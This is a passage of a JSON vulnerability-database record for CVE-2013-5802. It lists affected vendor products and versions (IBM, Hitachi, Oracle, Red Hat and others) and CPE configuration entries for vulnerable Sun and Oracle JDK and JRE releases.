"version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "cosminexus application server enterprise version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.14" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.06" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6)5.5" }, { "model": "freeflow print server 82.c5.24", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "smartcloud orchestrator fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "websphere transformation extender", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.36" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "network satellite server (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus developer version 05-01-/l", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer professional version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere dashboard framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "freeflow print server 82.d1.44", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "jrockit r27.7.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "cosminexus client version 06-51-/n", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "tivoli netcool/impact", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "cosminexus application server enterprise version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56003" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.12" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "cosminexus developer professional version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "filenet p8 platform process engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cosminexus client version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer light version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cosminexus studio version 05-00-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "5" }, { "model": "cosminexus developer professional version 06-51-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-00-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus domino fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.5" }, { "model": "cosminexus developer professional version 06-50-/e", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "freeflow print server 73.d4.31", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.4" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.145" }, { "model": "tivoli business service manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "freeflow print server 81.c3.31", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.3.3" }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "cosminexus application server standard version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-02" }, { "model": "freeflow print server 93.e0.21c", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "cosminexus client version 06-50-/i", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "jrockit r28.2.7", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus application server standard version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.2.4" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "lotus notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cosminexus application server enterprise version )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "606-51" }, { "model": "satellite (for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5)5.6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud provisioning", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "cosminexus application server standard version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 06-02-/g", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer light version 06-50-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus client version 06-02-/d", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "505-01" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "jrockit r28.2.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "freeflow print server 73.d2.33", "scope": null, "trust": 0.3, "vendor": "xerox", "version": null }, { "model": "cosminexus client version 06-51-/b", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" } ], "sources": [ { "db": "BID", "id": "63135" }, { "db": "CNNVD", "id": "CNNVD-201310-380" }, { "db": "NVD", "id": "CVE-2013-5802" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update28:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update51:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update45:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update40:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.5.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update36:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update40:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": 